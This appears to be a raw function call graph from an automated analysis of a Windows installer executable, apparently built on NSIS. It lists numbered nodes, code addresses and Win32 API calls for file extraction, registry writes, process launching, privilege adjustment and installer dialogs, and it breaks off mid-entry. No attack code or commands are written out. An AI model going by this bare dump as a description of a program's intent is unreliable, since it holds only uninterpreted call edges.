402c53 18 API calls 3935->3936 3937 4028d1 3936->3937 3938 4028e7 3937->3938 3939 402c53 18 API calls 3937->3939 3940 405dc2 2 API calls 3938->3940 3939->3938 3941 4028ed 3940->3941 3963 405de7 GetFileAttributesW CreateFileW 3941->3963 3943 4028fa 3944 402906 GlobalAlloc 3943->3944 3945 40299d 3943->3945 3946 402994 CloseHandle 3944->3946 3947 40291f 3944->3947 3948 4029a5 DeleteFileW 3945->3948 3949 4029b8 3945->3949 3946->3945 3964 403402 SetFilePointer 3947->3964 3948->3949 3951 402925 3952 4033ec ReadFile 3951->3952 3953 40292e GlobalAlloc 3952->3953 3954 402972 3953->3954 3955 40293e 3953->3955 3956 405e99 WriteFile 3954->3956 3957 40317b 45 API calls 3955->3957 3958 40297e GlobalFree 3956->3958 3962 40294b 3957->3962 3959 40317b 45 API calls 3958->3959 3960 402991 3959->3960 3960->3946 3961 402969 GlobalFree 3961->3954 3962->3961 3963->3943 3964->3951 3965 404ac7 3966 404af3 3965->3966 3967 404ad7 3965->3967 3969 404b26 3966->3969 3970 404af9 SHGetPathFromIDListW 3966->3970 3976 40593b GetDlgItemTextW 3967->3976 3972 404b10 SendMessageW 3970->3972 3973 404b09 3970->3973 3971 404ae4 SendMessageW 3971->3966 3972->3969 3974 40140b 2 API calls 3973->3974 3974->3972 3976->3971 3344 40344a SetErrorMode GetVersion 3345 403485 3344->3345 3346 40347f 3344->3346 3348 40657c 3 API calls 3345->3348 3347 4065ec 5 API calls 3346->3347 3347->3345 3349 40349b lstrlenA 3348->3349 3349->3345 3350 4034ab 3349->3350 3351 4065ec 5 API calls 3350->3351 3352 4034b3 3351->3352 3353 4065ec 5 API calls 3352->3353 3354 4034ba #17 OleInitialize SHGetFileInfoW 3353->3354 3432 406212 lstrcpynW 3354->3432 3356 4034f7 GetCommandLineW 3433 406212 lstrcpynW 3356->3433 3358 403509 GetModuleHandleW 3359 403521 3358->3359 3360 405bf3 CharNextW 3359->3360 3361 403530 CharNextW 3360->3361 3362 40365a GetTempPathW 3361->3362 3370 403549 3361->3370 3434 403419 3362->3434 3364 403672 3365 403676 GetWindowsDirectoryW lstrcatW 3364->3365 3366 4036cc DeleteFileW 3364->3366 3367 403419 12 API calls 3365->3367 3444 402ed5 GetTickCount GetModuleFileNameW 3366->3444 3371 403692 3367->3371 3368 405bf3 CharNextW 3368->3370 3370->3368 3376 403645 3370->3376 3377 403643 3370->3377 3371->3366 3372 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3371->3372 3375 403419 12 API calls 3372->3375 3373 403797 ExitProcess CoUninitialize 3379 4038cd 3373->3379 3380 4037ad 3373->3380 3374 4036e0 3374->3373 3378 403783 3374->3378 3386 405bf3 CharNextW 3374->3386 3384 4036c4 3375->3384 3530 406212 lstrcpynW 3376->3530 3377->3362 3474 403a5b 3378->3474 3382 403951 ExitProcess 3379->3382 3383 4038d5 GetCurrentProcess OpenProcessToken 3379->3383 3533 405957 3380->3533 3390 403921 3383->3390 3391 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 3383->3391 3384->3366 3384->3373 3400 4036ff 3386->3400 3393 4065ec 5 API calls 3390->3393 3391->3390 3392 403793 3392->3373 3396 403928 3393->3396 3394 4037c3 3397 4058da 5 API calls 3394->3397 3395 40375d 3398 405cce 18 API calls 3395->3398 3399 40393d ExitWindowsEx 3396->3399 3403 40394a 3396->3403 3401 4037c8 lstrcatW 3397->3401 3402 403769 3398->3402 3399->3382 3399->3403 3400->3394 3400->3395 3404 4037e4 lstrcatW lstrcmpiW 3401->3404 3405 4037d9 lstrcatW 3401->3405 3402->3373 3531 406212 lstrcpynW 3402->3531 3542 40140b 3403->3542 3404->3373 3407 403800 3404->3407 3405->3404 3409 403805 3407->3409 3410 40380c 3407->3410 3412 405840 4 API calls 3409->3412 3414 4058bd 2 API calls 3410->3414 3411 403778 3532 406212 lstrcpynW 3411->3532 3415 40380a 3412->3415 3416 403811 SetCurrentDirectoryW 3414->3416 3415->3416 3417 403821 3416->3417 3418 40382c 3416->3418 3537 406212 lstrcpynW 3417->3537 3538 406212 lstrcpynW 3418->3538 3421 406234 18 API calls 3422 40386b DeleteFileW 3421->3422 3423 403878 CopyFileW 3422->3423 3429 40383a 3422->3429 3423->3429 3424 4038c1 3425 4060b3 38 API calls 3424->3425 3427 4038c8 3425->3427 3426 4060b3 38 API calls 3426->3429 3427->3373 3428 406234 18 API calls 3428->3429 3429->3421 3429->3424 3429->3426 3429->3428 3431 4038ac CloseHandle 3429->3431 3539 4058f2 CreateProcessW 3429->3539 3431->3429 3432->3356 3433->3358 3435 4064a6 5 API calls 3434->3435 3436 403425 3435->3436 3437 40342f 3436->3437 3438 405bc6 3 API calls 3436->3438 3437->3364 3439 403437 3438->3439 3440 4058bd 2 API calls 3439->3440 3441 40343d 3440->3441 3545 405e16 3441->3545 3549 405de7 GetFileAttributesW CreateFileW 3444->3549 3446 402f18 3473 402f25 3446->3473 3550 406212 lstrcpynW 3446->3550 3448 402f3b 3449 405c12 2 API calls 3448->3449 3450 402f41 3449->3450 3551 406212 lstrcpynW 3450->3551 3452 402f4c GetFileSize 3453 40304d 3452->3453 3471 402f63 3452->3471 3552 402e33 3453->3552 3457 403090 GlobalAlloc 3461 4030a7 3457->3461 3458 4030e8 3459 402e33 33 API calls 3458->3459 3459->3473 3465 405e16 2 API calls 3461->3465 3462 403071 3463 4033ec ReadFile 3462->3463 3466 40307c 3463->3466 3464 402e33 33 API calls 3464->3471 3467 4030b8 CreateFileW 3465->3467 3466->3457 3466->3473 3468 4030f2 3467->3468 3467->3473 3567 403402 SetFilePointer 3468->3567 3470 403100 3568 40317b 3470->3568 3471->3453 3471->3458 3471->3464 3471->3473 3583 4033ec 3471->3583 3473->3374 3475 4065ec 5 API calls 3474->3475 3476 403a6f 3475->3476 3477 403a75 3476->3477 3478 403a87 3476->3478 3631 406159 wsprintfW 3477->3631 3479 4060df 3 API calls 3478->3479 3480 403ab7 3479->3480 3481 403ad6 lstrcatW 3480->3481 3484 4060df 3 API calls 3480->3484 3483 403a85 3481->3483 3615 403d31 3483->3615 3484->3481 3487 405cce 18 API calls 3488 403b08 3487->3488 3489 403b9c 3488->3489 3492 4060df 3 API calls 3488->3492 3490 405cce 18 API calls 3489->3490 3491 403ba2 3490->3491 3493 403bb2 LoadImageW 3491->3493 3495 406234 18 API calls 3491->3495 3494 403b3a 3492->3494 3496 403c58 3493->3496 3497 403bd9 RegisterClassW 3493->3497 3494->3489 3498 403b5b lstrlenW 3494->3498 3502 405bf3 CharNextW 3494->3502 3495->3493 3501 40140b 2 API calls 3496->3501 3499 403c62 3497->3499 3500 403c0f SystemParametersInfoW CreateWindowExW 3497->3500 3503 403b69 lstrcmpiW 3498->3503 3504 403b8f 3498->3504 3499->3392 3500->3496 3505 403c5e 3501->3505 3506 403b58 3502->3506 3503->3504 3507 403b79 GetFileAttributesW 3503->3507 3508 405bc6 3 API calls 3504->3508 3505->3499 3510 403d31 19 API calls 3505->3510 3506->3498 3509 403b85 3507->3509 3511 403b95 3508->3511 3509->3504 3512 405c12 2 API calls 3509->3512 3513 403c6f 3510->3513 3632 406212 lstrcpynW 3511->3632 3512->3504 3515 403c7b ShowWindow 3513->3515 3516 403cfe 3513->3516 3518 40657c 3 API calls 3515->3518 3624 405444 OleInitialize 3516->3624 3520 403c93 3518->3520 3519 403d04 3522 403d20 3519->3522 3523 403d08 3519->3523 3521 403ca1 GetClassInfoW 3520->3521 3524 40657c 3 API calls 3520->3524 3526 403cb5 GetClassInfoW RegisterClassW 3521->3526 3527 403ccb DialogBoxParamW 3521->3527 3525 40140b 2 API calls 3522->3525 3523->3499 3529 40140b 2 API calls 3523->3529 3524->3521 3525->3499 3526->3527 3528 40140b 2 API calls 3527->3528 3528->3499 3529->3499 3530->3377 3531->3411 3532->3378 3534 40596c 3533->3534 3535 4037bb ExitProcess 3534->3535 3536 405980 MessageBoxIndirectW 3534->3536 3536->3535 3537->3418 3538->3429 3540 405931 3539->3540 3541 405925 CloseHandle 3539->3541 3540->3429 3541->3540 3543 401389 2 API calls 3542->3543 3544 401420 3543->3544 3544->3382 3546 405e23 GetTickCount GetTempFileNameW 3545->3546 3547 403448 3546->3547 3548 405e59 3546->3548 3547->3364 3548->3546 3548->3547 3549->3446 3550->3448 3551->3452 3553 402e44 3552->3553 3554 402e5c 3552->3554 3555 402e54 3553->3555 3556 402e4d DestroyWindow 3553->3556 3557 402e64 3554->3557 3558 402e6c GetTickCount 3554->3558 3555->3457 3555->3473 3586 403402 SetFilePointer 3555->3586 3556->3555 3587 406628 3557->3587 3558->3555 3560 402e7a 3558->3560 3561 402e82 3560->3561 3562 402eaf CreateDialogParamW ShowWindow 3560->3562 3561->3555 3591 402e17 3561->3591 3562->3555 3564 402e90 wsprintfW 3565 405371 25 API calls 3564->3565 3566 402ead 3565->3566 3566->3555 3567->3470 3569 4031a6 3568->3569 3570 40318a SetFilePointer 3568->3570 3594 403283 GetTickCount 3569->3594 3570->3569 3573 403243 3573->3473 3574 405e6a ReadFile 3575 4031c6 3574->3575 3575->3573 3576 403283 43 API calls 3575->3576 3577 4031dd 3576->3577 3577->3573 3578 403249 ReadFile 3577->3578 3580 4031ec 3577->3580 3578->3573 3580->3573 3581 405e6a ReadFile 3580->3581 3582 405e99 WriteFile 3580->3582 3581->3580 3582->3580 3584 405e6a ReadFile 3583->3584 3585 4033ff 3584->3585 3585->3471 3586->3462 3588 406645 PeekMessageW 3587->3588 3589 406655 3588->3589 3590 40663b DispatchMessageW 3588->3590 3589->3555 3590->3588 3592 402e26 3591->3592 3593 402e28 MulDiv 3591->3593 3592->3593 3593->3564 3595 4032b1 3594->3595 3596 4033db 3594->3596 3607 403402 SetFilePointer 3595->3607 3597 402e33 33 API calls 3596->3597 3604 4031ad 3597->3604 3599 4032bc SetFilePointer 3603 4032e1 3599->3603 3600 4033ec ReadFile 3600->3603 3602 402e33 33 API calls 3602->3603 3603->3600 3603->3602 3603->3604 3605 405e99 WriteFile 3603->3605 3606 4033bc SetFilePointer 3603->3606 3608 40672b 3603->3608 3604->3573 3604->3574 3605->3603 3606->3596 3607->3599 3609 406750 3608->3609 3610 406758 3608->3610 3609->3603 3610->3609 3611 4067e8 GlobalAlloc 3610->3611 3612 4067df GlobalFree 3610->3612 3613 406856 GlobalFree 3610->3613 3614 40685f GlobalAlloc 3610->3614 3611->3609 3611->3610 3612->3611 3613->3614 3614->3609 3614->3610 3616 403d45 3615->3616 3633 406159 wsprintfW 3616->3633 3618 403db6 3619 406234 18 API calls 3618->3619 3620 403dc2 SetWindowTextW 3619->3620 3621 403ae6 3620->3621 3622 403dde 3620->3622 3621->3487 3622->3621 3623 406234 18 API calls 3622->3623 3623->3622 3634 404322 3624->3634 3626 40548e 3627 404322 SendMessageW 3626->3627 3629 4054a0 CoUninitialize 3627->3629 3628 405467 3628->3626 3637 401389 3628->3637 3629->3519 3631->3483 3632->3489 3633->3618 3635 40433a 3634->3635 3636 40432b SendMessageW 3634->3636 3635->3628 3636->3635 3639 401390 3637->3639 3638 4013fe 3638->3628 3639->3638 3640 4013cb MulDiv SendMessageW 3639->3640 3640->3639 3977 402a4b 3978 402c31 18 API calls 3977->3978 3979 402a51 3978->3979 3980 402a88 3979->3980 3982 4028a1 3979->3982 3983 402a63 3979->3983 3981 406234 18 API calls 3980->3981 3980->3982 3981->3982 3983->3982 3985 406159 wsprintfW 3983->3985 3985->3982 3989 4016cc 3990 402c53 18 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3993 40170e 3991->3993 3992->3993 3996 406555 2 API calls 3992->3996 3994 401723 GetShortPathNameW 3993->3994 3995 402adb 3993->3995 3994->3995 3997 4016fe 3996->3997 3997->3993 3999 406212 lstrcpynW 3997->3999 3999->3993 4000 401b4d 4001 402c53 18 API calls 4000->4001 4002 401b54 4001->4002 4003 402c31 18 API calls 4002->4003 4004 401b5d wsprintfW 4003->4004 4005 402adb 4004->4005 4013 40234e 4014 402c53 18 API calls 4013->4014 4015 40235d 4014->4015 4016 402c53 18 API calls 4015->4016 4017 402366 4016->4017 4018 402c53 18 API calls 4017->4018 4019 402370 GetPrivateProfileStringW 4018->4019 4020 402851 4021 402859 4020->4021 4022 40285d FindNextFileW 4021->4022 4024 40286f 4021->4024 4023 4028b6 4022->4023 4022->4024 4026 406212 lstrcpynW 4023->4026 4026->4024 3819 401ed5 3820 402c53 18 API calls 3819->3820 3821 401edb 3820->3821 3822 405371 25 API calls 3821->3822 3823 401ee5 3822->3823 3824 4058f2 2 API calls 3823->3824 3825 401eeb 3824->3825 3826 4028a1 3825->3826 3827 401f4a CloseHandle 3825->3827 3828 401efb WaitForSingleObject 3825->3828 3827->3826 3829 401f0d 3828->3829 3830 401f1f GetExitCodeProcess 3829->3830 3833 406628 2 API calls 3829->3833 3831 401f31 3830->3831 3832 401f3e 3830->3832 3837 406159 wsprintfW 3831->3837 3832->3827 3835 401f3c 3832->3835 3836 401f14 WaitForSingleObject 3833->3836 3835->3827 3836->3829 3837->3835 4027 401956 4028 402c53 18 API calls 4027->4028 4029 40195d lstrlenW 4028->4029 4030 4025a8 4029->4030 4031 4014d7 4032 402c31 18 API calls 4031->4032 4033 4014dd Sleep 4032->4033 4035 402adb 4033->4035 4036 401f58 4037 402c53 18 API calls 4036->4037 4038 401f5f 4037->4038 4039 406555 2 API calls 4038->4039 4040 401f65 4039->4040 4042 401f76 4040->4042 4043 406159 wsprintfW 4040->4043 4043->4042 4044 402259 4045 402c53 18 API calls 4044->4045 4046 40225f 4045->4046 4047 402c53 18 API calls 4046->4047 4048 402268 4047->4048 4049 402c53 18 API calls 4048->4049 4050 402271 4049->4050 4051 406555 2 API calls 4050->4051 4052 40227a 4051->4052 4053 40228b lstrlenW lstrlenW 4052->4053 4057 40227e 4052->4057 4055 405371 25 API calls 4053->4055 4054 405371 25 API calls 4058 402286 4054->4058 4056 4022c9 SHFileOperationW 4055->4056 4056->4057 4056->4058 4057->4054 4057->4058 4059 4068da 4063 40675e 4059->4063 4060 4070c9 4061 4067e8 GlobalAlloc 4061->4060 4061->4063 4062 4067df GlobalFree 4062->4061 4063->4060 4063->4061 4063->4062 4064 406856 GlobalFree 4063->4064 4065 40685f GlobalAlloc 4063->4065 4064->4065 4065->4060 4065->4063 3838 40175c 3839 402c53 18 API calls 3838->3839 3840 401763 3839->3840 3841 405e16 2 API calls 3840->3841 3842 40176a 3841->3842 3843 405e16 2 API calls 3842->3843 3843->3842 4066 4022dd 4067 4022e4 4066->4067 4070 4022f7 4066->4070 4068 406234 18 API calls 4067->4068 4069 4022f1 4068->4069 4071 405957 MessageBoxIndirectW 4069->4071 4071->4070 4072 402660 4073 402c31 18 API calls 4072->4073 4074 40266f 4073->4074 4075 4026b9 ReadFile 4074->4075 4076 405e6a ReadFile 4074->4076 4077 4026f9 MultiByteToWideChar 4074->4077 4078 4027ae 4074->4078 4081 40271f SetFilePointer MultiByteToWideChar 4074->4081 4082 4027bf 4074->4082 4084 4027ac 4074->4084 4085 405ec8 SetFilePointer 4074->4085 4075->4074 4075->4084 4076->4074 4077->4074 4094 406159 wsprintfW 4078->4094 4081->4074 4083 4027e0 SetFilePointer 4082->4083 4082->4084 4083->4084 4086 405ee4 4085->4086 4091 405f00 4085->4091 4087 405e6a ReadFile 4086->4087 4088 405ef0 4087->4088 4089 405f31 SetFilePointer 4088->4089 4090 405f09 SetFilePointer 4088->4090 4088->4091 4089->4091 4090->4089 4092 405f14 4090->4092 4091->4074 4093 405e99 WriteFile 4092->4093 4093->4091 4094->4084 4095 401563 4096 402a81 4095->4096 4099 406159 wsprintfW 4096->4099 4098 402a86 4099->4098 4107 4052e5 4108 4052f5 4107->4108 4109 405309 4107->4109 4110 4052fb 4108->4110 4119 405352 4108->4119 4111 405311 IsWindowVisible 4109->4111 4114 405328 4109->4114 4112 404322 SendMessageW 4110->4112 4113 40531e 4111->4113 4111->4119 4116 405305 4112->4116 4120 404c3b SendMessageW 4113->4120 4115 405357 CallWindowProcW 4114->4115 4125 404cbb 4114->4125 4115->4116 4119->4115 4121 404c9a SendMessageW 4120->4121 4122 404c5e GetMessagePos ScreenToClient SendMessageW 4120->4122 4124 404c92 4121->4124 4123 404c97 4122->4123 4122->4124 4123->4121 4124->4114 4134 406212 lstrcpynW 4125->4134 4127 404cce 4135 406159 wsprintfW 4127->4135 4129 404cd8 4130 40140b 2 API calls 4129->4130 4131 404ce1 4130->4131 4136 406212 lstrcpynW 4131->4136 4133 404ce8 4133->4119 4134->4127 4135->4129 4136->4133 4137 401968 4138 402c31 18 API calls 4137->4138 4139 40196f 4138->4139 4140 402c31 18 API calls 4139->4140 4141 40197c 4140->4141 4142 402c53 18 API calls 4141->4142 4143 401993 lstrlenW 4142->4143 4144 4019a4 4143->4144 4145 4019e5 4144->4145 4149 406212 lstrcpynW 4144->4149 4147 4019d5 4147->4145 4148 4019da lstrlenW 4147->4148 4148->4145 4149->4147 3331 403969 3332 403984 3331->3332 3333 40397a CloseHandle 3331->3333 3334 403998 3332->3334 3335 40398e CloseHandle 3332->3335 3333->3332 3340 4039c6 3334->3340 3335->3334 3338 405a03 69 API calls 3339 4039a9 3338->3339 3341 4039d4 3340->3341 3342 40399d 3341->3342 3343 4039d9 FreeLibrary GlobalFree 3341->3343 3342->3338 3343->3342 3343->3343 3641 4023ea 3642 4023f0 3641->3642 3643 402c53 18 API calls 3642->3643 3644 402402 3643->3644 3645 402c53 18 API calls 3644->3645 3646 40240c RegCreateKeyExW 3645->3646 3647 402436 3646->3647 3649 4028a1 3646->3649 3648 402451 3647->3648 3650 402c53 18 API calls 3647->3650 3651 40245d 3648->3651 3658 402c31 3648->3658 3653 402447 lstrlenW 3650->3653 3652 40247c RegSetValueExW 3651->3652 3655 40317b 45 API calls 3651->3655 3656 402492 RegCloseKey 3652->3656 3653->3648 3655->3652 3656->3649 3659 406234 18 API calls 3658->3659 3660 402c46 3659->3660 3660->3651 4150 40166a 4151 402c53 18 API calls 4150->4151 4152 401670 4151->4152 4153 406555 2 API calls 4152->4153 4154 401676 4153->4154 4155 4043ea lstrcpynW lstrlenW 4156 404ced GetDlgItem GetDlgItem 4157 404d3f 7 API calls 4156->4157 4161 404f58 4156->4161 4158 404de2 DeleteObject 4157->4158 4159 404dd5 SendMessageW 4157->4159 4160 404deb 4158->4160 4159->4158 4162 404e22 4160->4162 4164 406234 18 API calls 4160->4164 4175 404c3b 5 API calls 4161->4175 4179 40503c 4161->4179 4188 404fc9 4161->4188 4165 4042d6 19 API calls 4162->4165 4163 4050e8 4168 4050f2 SendMessageW 4163->4168 4169 4050fa 4163->4169 4170 404e04 SendMessageW SendMessageW 4164->4170 4166 404e36 4165->4166 4171 4042d6 19 API calls 4166->4171 4167 404f4b 4173 40433d 8 API calls 4167->4173 4168->4169 4180 405113 4169->4180 4181 40510c ImageList_Destroy 4169->4181 4185 405123 4169->4185 4170->4160 4189 404e44 4171->4189 4172 405095 SendMessageW 4172->4167 4177 4050aa SendMessageW 4172->4177 4178 4052de 4173->4178 4174 40502e SendMessageW 4174->4179 4175->4188 4176 405292 4176->4167 4186 4052a4 ShowWindow GetDlgItem ShowWindow 4176->4186 4184 4050bd 4177->4184 4179->4163 4179->4167 4179->4172 4182 40511c GlobalFree 4180->4182 4180->4185 4181->4180 4182->4185 4183 404f19 GetWindowLongW SetWindowLongW 4187 404f32 4183->4187 4194 4050ce SendMessageW 4184->4194 4185->4176 4199 404cbb 4 API calls 4185->4199 4203 40515e 4185->4203 4186->4167 4190 404f50 4187->4190 4191 404f38 ShowWindow 4187->4191 4188->4174 4188->4179 4189->4183 4193 404e94 SendMessageW 4189->4193 4195 404f13 4189->4195 4197 404ed0 SendMessageW 4189->4197 4198 404ee1 SendMessageW 4189->4198 4208 40430b SendMessageW 4190->4208 4207 40430b SendMessageW 4191->4207 4193->4189 4194->4163 4195->4183 4195->4187 4197->4189 4198->4189 4199->4203 4200 405268 InvalidateRect 4200->4176 4201 40527e 4200->4201 4209 404bf6 4201->4209 4202 40518c SendMessageW 4206 4051a2 4202->4206 4203->4202 4203->4206 4205 405216 SendMessageW SendMessageW 4205->4206 4206->4200 4206->4205 4207->4167 4208->4161 4212 404b2d 4209->4212 4211 404c0b 4211->4176 4213 404b46 4212->4213 4214 406234 18 API calls 4213->4214 4215 404baa 4214->4215 4216 406234 18 API calls 4215->4216 4217 404bb5 4216->4217 4218 406234 18 API calls 4217->4218 4219 404bcb lstrlenW wsprintfW SetDlgItemTextW 4218->4219 4219->4211 4220 401ced 4221 402c31 18 API calls 4220->4221 4222 401cf3 IsWindow 4221->4222 4223 401a20 4222->4223 3698 40176f 3699 402c53 18 API calls 3698->3699 3700 401776 3699->3700 3701 401796 3700->3701 3702 40179e 3700->3702 3737 406212 lstrcpynW 3701->3737 3738 406212 lstrcpynW 3702->3738 3705 40179c 3709 4064a6 5 API calls 3705->3709 3706 4017a9 3707 405bc6 3 API calls 3706->3707 3708 4017af lstrcatW 3707->3708 3708->3705 3725 4017bb 3709->3725 3710 406555 2 API calls 3710->3725 3711 405dc2 2 API calls 3711->3725 3713 4017cd CompareFileTime 3713->3725 3714 40188d 3715 405371 25 API calls 3714->3715 3718 401897 3715->3718 3716 405371 25 API calls 3720 401879 3716->3720 3717 406212 lstrcpynW 3717->3725 3719 40317b 45 API calls 3718->3719 3721 4018aa 3719->3721 3722 4018be SetFileTime 3721->3722 3723 4018d0 CloseHandle 3721->3723 3722->3723 3723->3720 3726 4018e1 3723->3726 3724 406234 18 API calls 3724->3725 3725->3710 3725->3711 3725->3713 3725->3714 3725->3717 3725->3724 3731 405957 MessageBoxIndirectW 3725->3731 3734 401864 3725->3734 3736 405de7 GetFileAttributesW CreateFileW 3725->3736 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406234 18 API calls 3727->3729 3730 406234 18 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3731->3725 3732->3733 3735 405957 MessageBoxIndirectW 3733->3735 3734->3716 3734->3720 3735->3720 3736->3725 3737->3705 3738->3706 4224 404771 4225 40479d 4224->4225 4226 4047ae 4224->4226 4285 40593b GetDlgItemTextW 4225->4285 4227 4047ba GetDlgItem 4226->4227 4230 404819 4226->4230 4229 4047ce 4227->4229 4233 4047e2 SetWindowTextW 4229->4233 4236 405c71 4 API calls 4229->4236 4238 406234 18 API calls 4230->4238 4247 4048fd 4230->4247 4283 404aac 4230->4283 4231 4047a8 4232 4064a6 5 API calls 4231->4232 4232->4226 4237 4042d6 19 API calls 4233->4237 4235 40433d 8 API calls 4240 404ac0 4235->4240 4241 4047d8 4236->4241 4242 4047fe 4237->4242 4243 40488d SHBrowseForFolderW 4238->4243 4239 40492d 4244 405cce 18 API calls 4239->4244 4241->4233 4249 405bc6 3 API calls 4241->4249 4245 4042d6 19 API calls 4242->4245 4246 4048a5 CoTaskMemFree 4243->4246 4243->4247 4248 404933 4244->4248 4250 40480c 4245->4250 4251 405bc6 3 API calls 4246->4251 4247->4283 4287 40593b GetDlgItemTextW 4247->4287 4288 406212 lstrcpynW 4248->4288 4249->4233 4286 40430b SendMessageW 4250->4286 4253 4048b2 4251->4253 4257 4048e9 SetDlgItemTextW 4253->4257 4260 406234 18 API calls 4253->4260 4255 40494a 4259 4065ec 5 API calls 4255->4259 4256 404812 4258 4065ec 5 API calls 4256->4258 4257->4247 4258->4230 4266 404951 4259->4266 4261 4048d1 lstrcmpiW 4260->4261 4261->4257 4263 4048e2 lstrcatW 4261->4263 4262 404992 4289 406212 lstrcpynW 4262->4289 4263->4257 4265 404999 4267 405c71 4 API calls 4265->4267 4266->4262 4271 405c12 2 API calls 4266->4271 4272 4049ea 4266->4272 4268 40499f GetDiskFreeSpaceW 4267->4268 4270 4049c3 MulDiv 4268->4270 4268->4272 4270->4272 4271->4266 4273 404a5b 4272->4273 4275 404bf6 21 API calls 4272->4275 4274 404a7e 4273->4274 4277 40140b 2 API calls 4273->4277 4290 4042f8 KiUserCallbackDispatcher 4274->4290 4276 404a48 4275->4276 4278 404a5d SetDlgItemTextW 4276->4278 4279 404a4d 4276->4279 4277->4274 4278->4273 4281 404b2d 21 API calls 4279->4281 4281->4273 4282 404a9a 4282->4283 4291 404706 4282->4291 4283->4235 4285->4231 4286->4256 4287->4239 4288->4255 4289->4265 4290->4282 4292 404714 4291->4292 4293 404719 SendMessageW 4291->4293 4292->4293 4293->4283 4294 401b71 4295 401bc2 4294->4295 4296 401b7e 4294->4296 4298 401bc7 4295->4298 4299 401bec GlobalAlloc 4295->4299 4297 4022e4 4296->4297 4303 401b95 4296->4303 4301 406234 18 API calls 4297->4301 4312 401c07 4298->4312 4315 406212 lstrcpynW 4298->4315 4300 406234 18 API calls 4299->4300 4300->4312 4305 4022f1 4301->4305 4313 406212 lstrcpynW 4303->4313 4304 401bd9 GlobalFree 4304->4312 4308 405957 MessageBoxIndirectW 4305->4308 4307 401ba4 4314 406212 lstrcpynW 4307->4314 4308->4312 4310 401bb3 4316 406212 lstrcpynW 4310->4316 4313->4307 4314->4310 4315->4304 4316->4312 4317 401a72 4318 402c31 18 API calls 4317->4318 4319 401a78 4318->4319 4320 402c31 18 API calls 4319->4320 4321 401a20 4320->4321 4322 404473 4323 40448b 4322->4323 4328 4045a5 4322->4328 4329 4042d6 19 API calls 4323->4329 4324 40460f 4325 4046e1 4324->4325 4326 404619 GetDlgItem 4324->4326 4330 40433d 8 API calls 4325->4330 4327 404633 4326->4327 4331 4046a2 4326->4331 4327->4331 4336 404659 6 API calls 4327->4336 4328->4324 4328->4325 4332 4045e0 GetDlgItem SendMessageW 4328->4332 4333 4044f2 4329->4333 4335 4046dc 4330->4335 4331->4325 4337 4046b4 4331->4337 4353 4042f8 KiUserCallbackDispatcher 4332->4353 4334 4042d6 19 API calls 4333->4334 4339 4044ff CheckDlgButton 4334->4339 4336->4331 4340 4046ca 4337->4340 4341 4046ba SendMessageW 4337->4341 4351 4042f8 KiUserCallbackDispatcher 4339->4351 4340->4335 4344 4046d0 SendMessageW 4340->4344 4341->4340 4342 40460a 4345 404706 SendMessageW 4342->4345 4344->4335 4345->4324 4346 40451d GetDlgItem 4352 40430b SendMessageW 4346->4352 4348 404533 SendMessageW 4349 404550 GetSysColor 4348->4349 4350 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4348->4350 4349->4350 4350->4335 4351->4346 4352->4348 4353->4342 4354 401573 4355 401583 ShowWindow 4354->4355 4356 40158c 4354->4356 4355->4356 4357 40159a ShowWindow 4356->4357 4358 402adb 4356->4358 4357->4358 4359 4014f5 SetForegroundWindow 4360 402adb 4359->4360 4361 401e77 4362 402c53 18 API calls 4361->4362 4363 401e7d 4362->4363 4364 402c53 18 API calls 4363->4364 4365 401e86 4364->4365 4366 402c53 18 API calls 4365->4366 4367 401e8f 4366->4367 4368 402c53 18 API calls 4367->4368 4369 401e98 4368->4369 4370 401423 25 API calls 4369->4370 4371 401e9f ShellExecuteW 4370->4371 4372 401ed0 4371->4372 4380 40167b 4381 402c53 18 API calls 4380->4381 4382 401682 4381->4382 4383 402c53 18 API calls 4382->4383 4384 40168b 4383->4384 4385 402c53 18 API calls 4384->4385 4386 401694 MoveFileW 4385->4386 4387 4016a0 4386->4387 4388 4016a7 4386->4388 4390 401423 25 API calls 4387->4390 4389 406555 2 API calls 4388->4389 4392 402250 4388->4392 4391 4016b6 4389->4391 4390->4392 4391->4392 4393 4060b3 38 API calls 4391->4393 4393->4387 3844 403dfe 3845 403f51 3844->3845 3846 403e16 3844->3846 3848 403f62 GetDlgItem GetDlgItem 3845->3848 3849 403fa2 3845->3849 3846->3845 3847 403e22 3846->3847 3850 403e40 3847->3850 3851 403e2d SetWindowPos 3847->3851 3852 4042d6 19 API calls 3848->3852 3853 403ffc 3849->3853 3858 401389 2 API calls 3849->3858 3855 403e45 ShowWindow 3850->3855 3856 403e5d 3850->3856 3851->3850 3857 403f8c SetClassLongW 3852->3857 3854 404322 SendMessageW 3853->3854 3874 403f4c 3853->3874 3884 40400e 3854->3884 3855->3856 3859 403e65 DestroyWindow 3856->3859 3860 403e7f 3856->3860 3861 40140b 2 API calls 3857->3861 3862 403fd4 3858->3862 3913 40425f 3859->3913 3863 403e84 SetWindowLongW 3860->3863 3864 403e95 3860->3864 3861->3849 3862->3853 3865 403fd8 SendMessageW 3862->3865 3863->3874 3868 403ea1 GetDlgItem 3864->3868 3869 403f3e 3864->3869 3865->3874 3866 40140b 2 API calls 3866->3884 3867 404261 DestroyWindow KiUserCallbackDispatcher 3867->3913 3870 403ed1 3868->3870 3871 403eb4 SendMessageW IsWindowEnabled 3868->3871 3872 40433d 8 API calls 3869->3872 3876 403ede 3870->3876 3877 403f25 SendMessageW 3870->3877 3878 403ef1 3870->3878 3888 403ed6 3870->3888 3871->3870 3871->3874 3872->3874 3873 404290 ShowWindow 3873->3874 3875 406234 18 API calls 3875->3884 3876->3877 3876->3888 3877->3869 3881 403ef9 3878->3881 3882 403f0e 3878->3882 3879 4042af SendMessageW 3883 403f0c 3879->3883 3880 4042d6 19 API calls 3880->3884 3886 40140b 2 API calls 3881->3886 3885 40140b 2 API calls 3882->3885 3883->3869 3884->3866 3884->3867 3884->3874 3884->3875 3884->3880 3889 4042d6 19 API calls 3884->3889 3904 4041a1 DestroyWindow 3884->3904 3887 403f15 3885->3887 3886->3888 3887->3869 3887->3888 3888->3879 3890 404089 GetDlgItem 3889->3890 3891 4040a6 ShowWindow KiUserCallbackDispatcher 3890->3891 3892 40409e 3890->3892 3914 4042f8 KiUserCallbackDispatcher 3891->3914 3892->3891 3894 4040d0 EnableWindow 3897 